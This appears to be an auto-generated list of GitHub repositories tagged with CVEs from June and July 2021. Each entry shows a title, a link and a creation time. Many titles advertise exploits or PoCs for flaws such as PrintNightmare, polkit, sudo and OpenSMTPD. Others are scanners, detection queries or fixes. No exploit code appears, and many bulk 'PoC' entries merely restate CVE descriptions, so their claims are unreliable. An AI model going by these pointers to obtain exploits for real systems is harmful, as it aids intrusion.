**no description** : [whokilleddb/CVE-2019-15107](https://github.com/whokilleddb/CVE-2019-15107) create time: 2021-07-02T19:51:18Z

**Exploit Code For CVE-2019-15107** : [whokilleddb/CVE-2019-15107](https://github.com/whokilleddb/CVE-2019-15107) create time: 2021-07-02T18:22:45Z

**Explore CVE-2019-6447 using a script** : [sidhawkss/ES-File-Explorer-Vulnerability-on-port-59777](https://github.com/sidhawkss/ES-File-Explorer-Vulnerability-on-port-59777) create time: 2021-07-02T18:00:29Z

**CVE-2021-1675: ZERO-DAY VULNERABILITY IN WINDOWS PRINTER SERVICE WITH AN EXPLOIT AVAILABLE IN ALL OPERATING SYSTEM VERSIONS** : [ptter23/CVE-2021-1675](https://github.com/ptter23/CVE-2021-1675) create time: 2021-07-02T18:01:21Z

**A small powershell script to disable print spooler service using desired state configuration** : [kougyokugentou/CVE-2021-1675](https://github.com/kougyokugentou/CVE-2021-1675) create time: 2021-07-02T17:29:04Z

**no description** : [killtr0/CVE-2021-1675-PrintNightmare](https://github.com/killtr0/CVE-2021-1675-PrintNightmare) create time: 2021-07-02T16:12:15Z

**Fix for the security** : [fardinbarashi/Fix-CVE-2021-34527](https://github.com/fardinbarashi/Fix-CVE-2021-34527) create time: 2021-07-02T14:25:44Z

**no description** : [JohnHammond/CVE-2021-34527](https://github.com/JohnHammond/CVE-2021-34527) create time: 2021-07-02T12:10:49Z

**Apache Tapestry CVE-2021-27850 PoC** : [Ovi3/CVE_2021_27850_POC](https://github.com/Ovi3/CVE_2021_27850_POC) create time: 2021-07-02T10:21:58Z

**How to enable Smart Check to detect CVE-2019-5021** : [mawinkler/smartcheck-cve-2019-5021](https://github.com/mawinkler/smartcheck-cve-2019-5021) create time: 2021-07-02T10:10:26Z

**no description** : [mr-nO0b/CVE-2021-3560](https://github.com/mr-nO0b/CVE-2021-3560) create time: 2021-07-02T10:03:26Z

**OpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure** : [sec-it/exploit-CVE-2019-14530](https://github.com/sec-it/exploit-CVE-2019-14530) create time: 2021-06-30T08:59:57Z

**Kritische Sicherheitslücke PrintNightmare CVE-2021-34527** : [glshnu/PrintNightmare](https://github.com/glshnu/PrintNightmare) create time: 2021-07-02T07:30:52Z

**no description** : [mrezqi/CVE-2021-1675_CarbonBlack_HuntingQuery](https://github.com/mrezqi/CVE-2021-1675_CarbonBlack_HuntingQuery) create time: 2021-07-02T07:30:24Z

**no description** : [thomasgeens/CVE-2021-1675](https://github.com/thomasgeens/CVE-2021-1675) create time: 2021-07-02T06:14:29Z

**Vulnerability Scanner for CVE-2021-1675/PrintNightmare** : [Leonidus0x10/CVE-2021-1675-SCANNER](https://github.com/Leonidus0x10/CVE-2021-1675-SCANNER) create time: 2021-07-02T01:45:00Z

**Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)** : [calebstewart/CVE-2021-1675](https://github.com/calebstewart/CVE-2021-1675) create time: 2021-07-01T23:45:58Z

**no description** : [3hydraking/distccd_rce_CVE-2004-2687](https://github.com/3hydraking/distccd_rce_CVE-2004-2687) create time: 2021-07-01T21:56:34Z

**Fix without disabling Print Spooler** : [tanarchytan/CVE-2021-1675](https://github.com/tanarchytan/CVE-2021-1675) create time: 2021-07-01T19:50:46Z

**no description** : [cybersecurityworks553/CVE-2021-1675_PrintNightMare](https://github.com/cybersecurityworks553/CVE-2021-1675_PrintNightMare) create time: 2021-07-01T13:58:01Z

**Proof of Concept Exploit for CVE-2021-35956, AKCP sensorProbe - 'Multiple' Cross Site Scripting (XSS)** : [tcbutler320/CVE-2021-35956](https://github.com/tcbutler320/CVE-2021-35956) create time: 2021-07-01T12:44:05Z

**no description** : [DenizSe/CVE-2020-1675](https://github.com/DenizSe/CVE-2020-1675) create time: 2021-07-01T12:12:16Z

**no description** : [puckiestyle/CVE-2021-1675](https://github.com/puckiestyle/CVE-2021-1675) create time: 2021-07-01T12:24:19Z

**no description** : [Katarina-1997/IM-113-2016-Cvetkov-Katarina](https://github.com/Katarina-1997/IM-113-2016-Cvetkov-Katarina) create time: 2021-07-01T10:52:05Z

**PoC for exploiting CVE-2020-21787** : [AlAIAL90/CVE-2020-21787](https://github.com/AlAIAL90/CVE-2020-21787) create time: 2021-07-01T10:07:10Z

**PoC for exploiting CVE-2020-24511** : [AlAIAL90/CVE-2020-24511](https://github.com/AlAIAL90/CVE-2020-24511) create time: 2021-07-01T10:06:58Z

**PoC for exploiting CVE-2020-24512** : [AlAIAL90/CVE-2020-24512](https://github.com/AlAIAL90/CVE-2020-24512) create time: 2021-07-01T10:06:51Z

**PoC for exploiting CVE-2020-21784** : [AlAIAL90/CVE-2020-21784](https://github.com/AlAIAL90/CVE-2020-21784) create time: 2021-07-01T10:06:45Z

**PoC for exploiting CVE-2021-29949** : [AlAIAL90/CVE-2021-29949](https://github.com/AlAIAL90/CVE-2021-29949) create time: 2021-07-01T10:10:07Z

**PoC for exploiting CVE-2021-21676** : [AlAIAL90/CVE-2021-21676](https://github.com/AlAIAL90/CVE-2021-21676) create time: 2021-07-01T10:10:01Z

**PoC for exploiting CVE-2021-21675** : [AlAIAL90/CVE-2021-21675](https://github.com/AlAIAL90/CVE-2021-21675) create time: 2021-07-01T10:09:57Z

**PoC for exploiting CVE-2021-21674** : [AlAIAL90/CVE-2021-21674](https://github.com/AlAIAL90/CVE-2021-21674) create time: 2021-07-01T10:09:52Z

**PoC for exploiting CVE-2021-21673** : [AlAIAL90/CVE-2021-21673](https://github.com/AlAIAL90/CVE-2021-21673) create time: 2021-07-01T10:09:48Z

**PoC for exploiting CVE-2021-21672** : [AlAIAL90/CVE-2021-21672](https://github.com/AlAIAL90/CVE-2021-21672) create time: 2021-07-01T10:09:45Z

**PoC for exploiting CVE-2021-21671** : [AlAIAL90/CVE-2021-21671](https://github.com/AlAIAL90/CVE-2021-21671) create time: 2021-07-01T10:09:40Z

**PoC for exploiting CVE-2021-21670** : [AlAIAL90/CVE-2021-21670](https://github.com/AlAIAL90/CVE-2021-21670) create time: 2021-07-01T10:09:36Z

**PoC for exploiting CVE-2021-29948** : [AlAIAL90/CVE-2021-29948](https://github.com/AlAIAL90/CVE-2021-29948) create time: 2021-07-01T10:09:32Z

**PoC for exploiting CVE-2021-33528** : [AlAIAL90/CVE-2021-33528](https://github.com/AlAIAL90/CVE-2021-33528) create time: 2021-07-01T10:09:28Z

**PoC for exploiting CVE-2021-33530** : [AlAIAL90/CVE-2021-33530](https://github.com/AlAIAL90/CVE-2021-33530) create time: 2021-07-01T10:09:16Z

**PoC for exploiting CVE-2021-33529** : [AlAIAL90/CVE-2021-33529](https://github.com/AlAIAL90/CVE-2021-33529) create time: 2021-07-01T10:09:12Z

**PoC for exploiting CVE-2021-33531** : [AlAIAL90/CVE-2021-33531](https://github.com/AlAIAL90/CVE-2021-33531) create time: 2021-07-01T10:09:08Z

**PoC for exploiting CVE-2021-29954** : [AlAIAL90/CVE-2021-29954](https://github.com/AlAIAL90/CVE-2021-29954) create time: 2021-07-01T10:09:04Z

**PoC for exploiting CVE-2021-32736** : [AlAIAL90/CVE-2021-32736](https://github.com/AlAIAL90/CVE-2021-32736) create time: 2021-07-01T10:08:59Z

**PoC for exploiting CVE-2021-22368** : [AlAIAL90/CVE-2021-22368](https://github.com/AlAIAL90/CVE-2021-22368) create time: 2021-07-01T10:08:54Z

**PoC for exploiting CVE-2021-22367** : [AlAIAL90/CVE-2021-22367](https://github.com/AlAIAL90/CVE-2021-22367) create time: 2021-07-01T10:08:50Z

**PoC for exploiting CVE-2021-22354** : [AlAIAL90/CVE-2021-22354](https://github.com/AlAIAL90/CVE-2021-22354) create time: 2021-07-01T10:08:46Z

**PoC for exploiting CVE-2021-22353** : [AlAIAL90/CVE-2021-22353](https://github.com/AlAIAL90/CVE-2021-22353) create time: 2021-07-01T10:08:42Z

**PoC for exploiting CVE-2021-1075** : [AlAIAL90/CVE-2021-1075](https://github.com/AlAIAL90/CVE-2021-1075) create time: 2021-07-01T10:08:39Z

**PoC for exploiting CVE-2021-29945** : [AlAIAL90/CVE-2021-29945](https://github.com/AlAIAL90/CVE-2021-29945) create time: 2021-07-01T10:08:34Z

**PoC for exploiting CVE-2021-20580** : [AlAIAL90/CVE-2021-20580](https://github.com/AlAIAL90/CVE-2021-20580) create time: 2021-07-01T10:08:31Z

**PoC for exploiting CVE-2021-20490** : [AlAIAL90/CVE-2021-20490](https://github.com/AlAIAL90/CVE-2021-20490) create time: 2021-07-01T10:08:26Z

**PoC for exploiting CVE-2021-20477** : [AlAIAL90/CVE-2021-20477](https://github.com/AlAIAL90/CVE-2021-20477) create time: 2021-07-01T10:08:14Z

**PoC for exploiting CVE-2021-29677** : [AlAIAL90/CVE-2021-29677](https://github.com/AlAIAL90/CVE-2021-29677) create time: 2021-07-01T10:08:10Z

**PoC for exploiting CVE-2021-33348** : [AlAIAL90/CVE-2021-33348](https://github.com/AlAIAL90/CVE-2021-33348) create time: 2021-07-01T10:07:25Z

**PoC for exploiting CVE-2021-29965** : [AlAIAL90/CVE-2021-29965](https://github.com/AlAIAL90/CVE-2021-29965) create time: 2021-07-01T10:07:06Z

**PoC for exploiting CVE-2021-31506** : [AlAIAL90/CVE-2021-31506](https://github.com/AlAIAL90/CVE-2021-31506) create time: 2021-07-01T10:07:02Z

**PoC for exploiting CVE-2021-29964** : [AlAIAL90/CVE-2021-29964](https://github.com/AlAIAL90/CVE-2021-29964) create time: 2021-07-01T10:06:50Z

**Local Privilege Escalation Edition for CVE-2021-1675** : [hlldz/CVE-2021-1675-LPE](https://github.com/hlldz/CVE-2021-1675-LPE) create time: 2021-07-01T09:47:13Z

**CVE-2021-1675 Simple LPE Exploit** : [evilashz/CVE-2021-1675-LPE-EXP](https://github.com/evilashz/CVE-2021-1675-LPE-EXP) create time: 2021-07-01T09:00:31Z

**openam-CVE-2021-35464 tomcat 执行命令回显** : [Y4er/openam-CVE-2021-35464](https://github.com/Y4er/openam-CVE-2021-35464) create time: 2021-07-01T03:51:32Z

**no description** : [zhongjiao01/cve-2021-21](https://github.com/zhongjiao01/cve-2021-21) create time: 2021-07-01T03:08:11Z

**no description** : [kondah/patch-cve-2021-1675](https://github.com/kondah/patch-cve-2021-1675) create time: 2021-06-30T23:39:21Z

**Create your malicious engine in seconds** : [Retr02332/CVE-2020-7115](https://github.com/Retr02332/CVE-2020-7115) create time: 2021-06-30T22:56:07Z

**CVE-2021-1675 Detection Info** : [LaresLLC/CVE-2021-1675](https://github.com/LaresLLC/CVE-2021-1675) create time: 2021-06-30T18:32:17Z

**no description** : [TheFlash2k/CVE-2021-3156](https://github.com/TheFlash2k/CVE-2021-3156) create time: 2021-06-30T18:00:03Z

**Exploit for CVE-2018-15961, a unrestricted file upload vulnerability in Adobe ColdFusion 2018 leading to RCE** : [xbufu/CVE-2018-15961](https://github.com/xbufu/CVE-2018-15961) create time: 2021-06-30T08:15:18Z

**CVE-2007-2447 - Samba usermap script** : [Alien0ne/CVE-2007-2447](https://github.com/Alien0ne/CVE-2007-2447) create time: 2021-06-30T00:13:31Z

**no description** : [AssassinUKG/Polkit-CVE-2021-3560](https://github.com/AssassinUKG/Polkit-CVE-2021-3560) create time: 2021-06-29T20:47:16Z

**Impacket implementation of CVE-2021-1675** : [cube0x0/CVE-2021-1675](https://github.com/cube0x0/CVE-2021-1675) create time: 2021-06-29T17:24:14Z

**Microsoft acknowledged a critical remote code execution vulnerability (CVE – 2020 - 1350) existing in Windows Domain Name System (DNS) when it fails to properly handle requests. An adversary who successfully exploits the vulnerability could run arbitrary code or malicious code in the context of the Local System Account. And this vulnerability rests on the DNS client while it handles specific requests. This means that an attacker who does not perform an authentication can gain control of an account that exists locally on the system, even remotely. This will allow the host to reach a complete compromise. T** : [ejlevin99/CVE---2020---1350](https://github.com/ejlevin99/CVE---2020---1350) create time: 2021-06-29T16:32:53Z

**Gitlab SSRF** : [Vulnmachines/gitlab-cve-2021-22214](https://github.com/Vulnmachines/gitlab-cve-2021-22214) create time: 2021-06-29T15:04:35Z

**CVE-2021-1675 exploit** : [yu2u/CVE-2021-1675](https://github.com/yu2u/CVE-2021-1675) create time: 2021-06-29T14:24:30Z

**Overview PoC of CSRF CVE-2019-9787 WordPress Version 5.1.1** : [dexXxed/CVE-2019-9787](https://github.com/dexXxed/CVE-2019-9787) create time: 2021-06-29T08:57:43Z

**ZeroShell命令执行漏洞批量扫描poc+exp** : [MzzdToT/CVE-2019-12725](https://github.com/MzzdToT/CVE-2019-12725) create time: 2021-06-29T06:24:22Z

**How to exploit a vulnerable windows driver** : [stong/CVE-2020-15368](https://github.com/stong/CVE-2020-15368) create time: 2021-06-29T04:38:24Z

**My exploit for ES Explorer Android App open port vulnerability.** : [N3H4L/CVE-2019-6447](https://github.com/N3H4L/CVE-2019-6447) create time: 2021-06-28T15:25:49Z

**no description** : [sijidufei/CVE-2016-5195](https://github.com/sijidufei/CVE-2016-5195) create time: 2021-06-28T03:38:32Z

**no description** : [yinyinmeimei/CVE-2017-7494-payload](https://github.com/yinyinmeimei/CVE-2017-7494-payload) create time: 2021-06-28T03:29:02Z

**Check the conditions for exploiting CVE-2021-23383 through the handlebars library version assessment.** : [dn9uy3n/Check-CVE-2021-23383](https://github.com/dn9uy3n/Check-CVE-2021-23383) create time: 2021-06-28T01:29:31Z

**POC for exploiting CVE-2021-27928** : [seska451/mariadb-cve-2021-27928](https://github.com/seska451/mariadb-cve-2021-27928) create time: 2021-06-27T13:02:58Z

**TESLA MODEL 3 HACK** : [AmazingOut/Tesla-CVE-2020-10558](https://github.com/AmazingOut/Tesla-CVE-2020-10558) create time: 2021-06-27T04:46:01Z

**compiled CVE-2015-1328** : [notlikethis/CVE-2015-1328](https://github.com/notlikethis/CVE-2015-1328) create time: 2021-06-26T22:20:07Z

**no description** : [amil-ptl-test/ptl_cve_2011_0228](https://github.com/amil-ptl-test/ptl_cve_2011_0228) create time: 2021-06-26T10:37:31Z

**no description** : [amil-ptl-test/ptl_cve_2018_6574](https://github.com/amil-ptl-test/ptl_cve_2018_6574) create time: 2021-06-26T10:39:22Z

**no description** : [mavillon1/CVE-2021-31955-POC](https://github.com/mavillon1/CVE-2021-31955-POC) create time: 2021-06-26T02:50:28Z

**Proof of Concept for CVE-2021-33624** : [Kakashiiiiy/CVE-2021-33624](https://github.com/Kakashiiiiy/CVE-2021-33624) create time: 2021-06-25T22:19:38Z

**A Proof of concept for CVE-2021-27850 affecting Apache Tapestry and leading to unauthencticated remote code execution.** : [kahla-sec/CVE-2021-27850_POC](https://github.com/kahla-sec/CVE-2021-27850_POC) create time: 2021-06-25T13:55:41Z

**Remote Mouse GUI 3.008 - Local Privilege Escalation** : [deathflash1411/CVE-2021-35448](https://github.com/deathflash1411/CVE-2021-35448) create time: 2021-06-25T08:58:10Z

**no description** : [donghyunlee00/CVE-2021-3156](https://github.com/donghyunlee00/CVE-2021-3156) create time: 2021-06-25T05:45:11Z

**no description** : [Hudi233/CVE-2020-3580](https://github.com/Hudi233/CVE-2020-3580) create time: 2021-06-25T04:39:30Z

**Writeup for CVE-2021-35475; Stored Cross-Site Scripting(XSS) on SAS® Environment Manager 2.5** : [saitamang/CVE-2021-35475](https://github.com/saitamang/CVE-2021-35475) create time: 2021-06-25T03:08:44Z

**My implementation of CVE-2020-0041** : [Byte-Master-101/CVE-2020-0041](https://github.com/Byte-Master-101/CVE-2020-0041) create time: 2021-06-25T02:19:17Z

**Resources for the Spectre vulnerability (CVE-2017-5753 and CVE-2017-5715)** : [raul23/spectre](https://github.com/raul23/spectre) create time: 2021-06-25T00:11:51Z

**Resources for the Meltdown vulnerability (CVE-2017-5754)** : [raul23/meltdown](https://github.com/raul23/meltdown) create time: 2021-06-25T00:07:21Z

**Resources for the Kr00k vulnerability (CVE-2019-15126)** : [raul23/Kr00k](https://github.com/raul23/Kr00k) create time: 2021-06-24T22:04:42Z

**no description** : [noobTest1122/CVE-2018-6574](https://github.com/noobTest1122/CVE-2018-6574) create time: 2021-06-24T16:23:55Z

**no description** : [KZMachine/CVERT-2021](https://github.com/KZMachine/CVERT-2021) create time: 2021-06-24T15:49:24Z

**PoC for CVE-2021-32537: an out-of-bounds memory access that leads to pool corruption in the Windows kernel.** : [0vercl0k/CVE-2021-32537](https://github.com/0vercl0k/CVE-2021-32537) create time: 2021-06-09T15:44:00Z

**Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11** : [nobodyatall648/CVE-2019-12744](https://github.com/nobodyatall648/CVE-2019-12744) create time: 2021-06-24T12:58:02Z

**GravCMS Unauthenticated Arbitrary YAML Write/Update leads to Code Execution (CVE-2021-21425)** : [CsEnox/CVE-2021-21425](https://github.com/CsEnox/CVE-2021-21425) create time: 2021-06-24T13:06:24Z

**no description** : [Badbird3/CVE-2017-5638](https://github.com/Badbird3/CVE-2017-5638) create time: 2021-06-24T05:41:45Z

**Archive: Exploit https://www.cvedetails.com/cve/CVE-2014-2321/ For CentOS** : [injectionmethod/ZTE-Vuln-4-Skids](https://github.com/injectionmethod/ZTE-Vuln-4-Skids) create time: 2021-06-24T03:16:18Z

**CVE 2021-21315 exploit** : [0UR4N05/CVE-2021-21315](https://github.com/0UR4N05/CVE-2021-21315) create time: 2021-06-22T20:18:38Z

**no description** : [KZMachine/CVERT_2021](https://github.com/KZMachine/CVERT_2021) create time: 2021-06-22T15:18:06Z

**no description** : [m3terpreter/CVE-2016-4437](https://github.com/m3terpreter/CVE-2016-4437) create time: 2021-06-22T06:08:55Z

**no description** : [KZMachine/KZMachine-CVERT_2021](https://github.com/KZMachine/KZMachine-CVERT_2021) create time: 2021-06-22T03:15:46Z

**Gitlab CI Lint API未授权 SSRF漏洞 (CVE-2021-22214)** : [r0ckysec/CVE-2021-22214](https://github.com/r0ckysec/CVE-2021-22214) create time: 2021-06-22T03:04:50Z

**a reliable C based exploit for CVE-2021-3560.** : [595cyi/CVE-2021-3560](https://github.com/595cyi/CVE-2021-3560) create time: 2021-06-22T02:18:31Z

**hello world** : [595cyi/CVE-2021-11111](https://github.com/595cyi/CVE-2021-11111) create time: 2021-06-21T10:21:21Z

**RCE in EXIF metadata removal from images research** : [awasthi7/CVE-2020-Exif-RCE](https://github.com/awasthi7/CVE-2020-Exif-RCE) create time: 2021-06-21T07:59:00Z

**no description** : [pywc/CVE-2019-0708](https://github.com/pywc/CVE-2019-0708) create time: 2021-06-21T03:57:15Z

**no description** : [rjt-gupta/CVE-2021-29337](https://github.com/rjt-gupta/CVE-2021-29337) create time: 2021-06-21T01:59:58Z

**go rce** : [jaya522/CVE-2018-6574-go-get-RCE](https://github.com/jaya522/CVE-2018-6574-go-get-RCE) create time: 2021-06-20T11:44:38Z

**A remote code execution issue was discovered in MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL. An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd. NOTE: this does not affect an Oracle product.** : [Diefunction/CVE-2021-27928](https://github.com/Diefunction/CVE-2021-27928) create time: 2021-06-20T08:54:06Z

**no description** : [mrofisr/docker-cve-2021-3156](https://github.com/mrofisr/docker-cve-2021-3156) create time: 2021-06-20T02:47:02Z

**POC-CVE-2019-0708** : [FroydCod3r/CVE-2019-0708](https://github.com/FroydCod3r/CVE-2019-0708) create time: 2021-06-19T21:55:57Z

**The sudo vulnerability CVE-2019-14287 is a security policy bypass issue that provides a user or a program the ability to execute commands as root on a Linux system when the "sudoers configuration" explicitly disallows the root access.** : [Hasintha-98/Sudo-Vulnerability-Exploit-CVE-2019-14287](https://github.com/Hasintha-98/Sudo-Vulnerability-Exploit-CVE-2019-14287) create time: 2021-06-19T09:43:08Z

**rpp2021-Katarina-1997 created by GitHub Classroom** : [RPP-IM-2021/IM113-2016-Cvetkov-Katarina](https://github.com/RPP-IM-2021/IM113-2016-Cvetkov-Katarina) create time: 2021-03-05T09:41:57Z

**PoC exploit for CVE-2020-7247 OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution** : [f4T1H21/CVE-2020-7247](https://github.com/f4T1H21/CVE-2020-7247) create time: 2021-06-19T07:34:42Z

**Privilege escalation with polkit - CVE-2021-3560** : [Almorabea/Polkit-exploit](https://github.com/Almorabea/Polkit-exploit) create time: 2021-06-19T08:15:17Z

**Pentesterlabs** : [yashanand/cve-2018-6574](https://github.com/yashanand/cve-2018-6574) create time: 2021-06-19T05:42:43Z

**PoC for exploiting CVE-2002-1847 : Buffer overflow in mplay32.exe of Microsoft Windows Media Player (WMP) 6.3 through 7.1 allows remote attackers to execute arbitrary commands via a long mp3 filename command line argument. NOTE: since the only known attack vector requires command line access, this may not be a vulnerability.** : [PwnCast/CVE-2002-1847](https://github.com/PwnCast/CVE-2002-1847) create time: 2021-06-18T10:26:00Z

**PoC for exploiting CVE-2005-0994 : Multiple SQL injection vulnerabilities in ProductCart 2.7 allow remote attackers to execute arbitrary SQL commands via (1) the Category or resultCnt parameters to advSearch_h.asp, and possibly (2) the offset parameter to tarinasworld_butterflyjournal.asp. NOTE: it is possible that item (2) is the result of a typo or editing error from the original research report.** : [PwnCast/CVE-2005-0994](https://github.com/PwnCast/CVE-2005-0994) create time: 2021-06-18T10:26:14Z

**PoC for exploiting CVE-2005-2225 : Microsoft MSN Messenger allows remote attackers to cause a denial of service via a plaintext message containing the ".pif" string, which is interpreted as a malicious file extension and causes users to be kicked from a group conversation. NOTE: it has been reported that Gaim is also affected, so this may be an issue in the protocol or MSN servers.** : [PwnCast/CVE-2005-2225](https://github.com/PwnCast/CVE-2005-2225) create time: 2021-06-18T10:26:07Z

**PoC for exploiting CVE-2014-0035 : The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.** : [PwnCast/CVE-2014-0035](https://github.com/PwnCast/CVE-2014-0035) create time: 2021-06-18T10:23:53Z

**PoC for exploiting CVE-2014-0109 : Apache CXF before 2.6.14 and 2.7.x before 2.7.11 allows remote attackers to cause a denial of service (memory consumption) via a large request with the Content-Type set to text/html to a SOAP endpoint, which triggers an error.** : [PwnCast/CVE-2014-0109](https://github.com/PwnCast/CVE-2014-0109) create time: 2021-06-18T10:23:46Z

**PoC for exploiting CVE-2014-0110 : Apache CXF before 2.6.14 and 2.7.x before 2.7.11 allows remote attackers to cause a denial of service (/tmp disk consumption) via a large invalid SOAP message.** : [PwnCast/CVE-2014-0110](https://github.com/PwnCast/CVE-2014-0110) create time: 2021-06-18T10:23:40Z

**PoC for exploiting CVE-2018-20060 : urllib3 before version 1.23 does not remove the Authorization HTTP header when following a cross-origin redirect (i.e., a redirect that differs in host, port, or scheme). This can allow for credentials in the Authorization header to be exposed to unintended hosts or transmitted in cleartext.** : [PwnCast/CVE-2018-20060](https://github.com/PwnCast/CVE-2018-20060) create time: 2021-06-18T10:25:26Z

**PoC for exploiting CVE-2018-20843 : In libexpat in Expat before 2.2.7, XML input including XML names that contain a large number of colons could make the XML parser consume a high amount of RAM and CPU resources while processing (enough to be usable for denial-of-service attacks).** : [PwnCast/CVE-2018-20843](https://github.com/PwnCast/CVE-2018-20843) create time: 2021-06-18T10:24:52Z

**PoC for exploiting CVE-2018-0008 : An unauthenticated root login may allow upon reboot when a commit script is used. A commit script allows a device administrator to execute certain instructions during commit, which is configured under the [system scripts commit] stanza. Certain commit scripts that work without a problem during normal commit may cause unexpected behavior upon reboot which can leave the system in a state where root CLI login is allowed without a password due to the system reverting to a "safe mode" authentication state. Lastly, only logging in physically to the console port as root, with no password, will work. Affected releases are Juniper Networks Junos OS: 12.1X46 versions prior to 12.1X46-D71 on SRX; 12.3X48 versions prior to 12.3X48-D55 on SRX; 14.1 versions prior to 14.1R9; 14.1X53 versions prior to 14.1X53-D40 on QFX, EX; 14.2 versions prior to 14.2R7-S9, 14.2R8; 15.1 versions prior to 15.1F5-S7, 15.1F6-S8, 15.1R5-S6, 15.1R6; 15.1X49 versions prior to 15.1X49-D110 on SRX; 15.1X53 versions prior to 15.1X53-D232 on QFX5200/5110; 15.1X53 versions prior to 15.1X53-D49, 15.1X53-D470 on NFX; 15.1X53 versions prior to 15.1X53-D65 on QFX10K; 16.1 versions prior to 16.1R2. No other Juniper Networks products or platforms are affected by this issue.** : [PwnCast/CVE-2018-0008](https://github.com/PwnCast/CVE-2018-0008) create time: 2021-06-18T10:23:14Z

**PoC for exploiting CVE-2019-11236 : In the urllib3 library through 1.24.1 for Python, CRLF injection is possible if the attacker controls the request parameter.** : [PwnCast/CVE-2019-11236](https://github.com/PwnCast/CVE-2019-11236) create time: 2021-06-18T10:25:40Z

**PoC for exploiting CVE-2019-11324 : The urllib3 library before 1.24.2 for Python mishandles certain cases where the desired set of CA certificates is different from the OS store of CA certificates, which results in SSL connections succeeding in situations where a verification failure is the correct outcome. This is related to use of the ssl_context, ca_certs, or ca_certs_dir argument.** : [PwnCast/CVE-2019-11324](https://github.com/PwnCast/CVE-2019-11324) create time: 2021-06-18T10:25:33Z

**PoC for exploiting CVE-2019-16168 : In SQLite through 3.29.0, whereLoopAddBtreeIndex in sqlite3.c can crash a browser or other application because of missing validation of a sqlite_stat1 sz field, aka a "severe division by zero in the query planner."** : [PwnCast/CVE-2019-16168](https://github.com/PwnCast/CVE-2019-16168) create time: 2021-06-18T10:25:07Z

**PoC for exploiting CVE-2019-15903 : In libexpat before 2.2.8, crafted XML input could fool the parser into changing from DTD parsing to document parsing too early; a consecutive call to XML_GetCurrentLineNumber (or XML_GetCurrentColumnNumber) then resulted in a heap-based buffer over-read.** : [PwnCast/CVE-2019-15903](https://github.com/PwnCast/CVE-2019-15903) create time: 2021-06-18T10:24:59Z

**Stored XSS via moodlenetprofile parameter in user profile** : [HoangKien1020/CVE-2020-25627](https://github.com/HoangKien1020/CVE-2020-25627) create time: 2021-06-18T10:37:23Z

**PoC for exploiting CVE-2020-11235 : Buffer overflow might occur while parsing unified command due to lack of check of input data received in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking** : [PwnCast/CVE-2020-11235](https://github.com/PwnCast/CVE-2020-11235) create time: 2021-06-18T10:26:54Z

**PoC for exploiting CVE-2020-11238 : Possible Buffer over-read in ARP/NS parsing due to lack of check of packet length received in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking** : [PwnCast/CVE-2020-11238](https://github.com/PwnCast/CVE-2020-11238) create time: 2021-06-18T10:26:47Z

**PoC for exploiting CVE-2020-11239 : Use after free issue when importing a DMA buffer by using the CPU address of the buffer due to attachment is not cleaned up properly in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables** : [PwnCast/CVE-2020-11239](https://github.com/PwnCast/CVE-2020-11239) create time: 2021-06-18T10:26:40Z

**PoC for exploiting CVE-2020-7751 : pathval before version 1.1.1 is vulnerable to prototype pollution.** : [PwnCast/CVE-2020-7751](https://github.com/PwnCast/CVE-2020-7751) create time: 2021-06-18T10:25:53Z

**PoC for exploiting CVE-2020-26137 : urllib3 before 1.25.9 allows CRLF injection if the attacker controls the HTTP request method, as demonstrated by inserting CR and LF control characters in the first argument of putrequest(). NOTE: this is similar to CVE-2020-26116.** : [PwnCast/CVE-2020-26137](https://github.com/PwnCast/CVE-2020-26137) create time: 2021-06-18T10:25:47Z

**PoC for exploiting CVE-2021-0484 : In readVector of IMediaPlayer.cpp, there is a possible read of uninitialized heap data due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-173720767** : [PwnCast/CVE-2021-0484](https://github.com/PwnCast/CVE-2021-0484) create time: 2021-06-18T10:27:01Z

**PoC for exploiting CVE-2021-20728 : Improper access control vulnerability in goo blog App for Android ver.1.2.25 and earlier and for iOS ver.1.3.3 and earlier allows a remote attacker to lead a user to access an arbitrary website via the vulnerable App.** : [PwnCast/CVE-2021-20728](https://github.com/PwnCast/CVE-2021-20728) create time: 2021-06-18T10:26:34Z

**PoC for exploiting CVE-2021-0480 : In createPendingIntent of SnoozeHelper.java, there is a possible broadcast intent containing a sensitive identifier. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-174493336** : [PwnCast/CVE-2021-0480](https://github.com/PwnCast/CVE-2021-0480) create time: 2021-06-18T10:26:27Z

**PoC for exploiting CVE-2021-0477 : In notifyScreenshotError of ScreenshotNotificationsController.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-178189250** : [PwnCast/CVE-2021-0477](https://github.com/PwnCast/CVE-2021-0477) create time: 2021-06-18T10:26:20Z

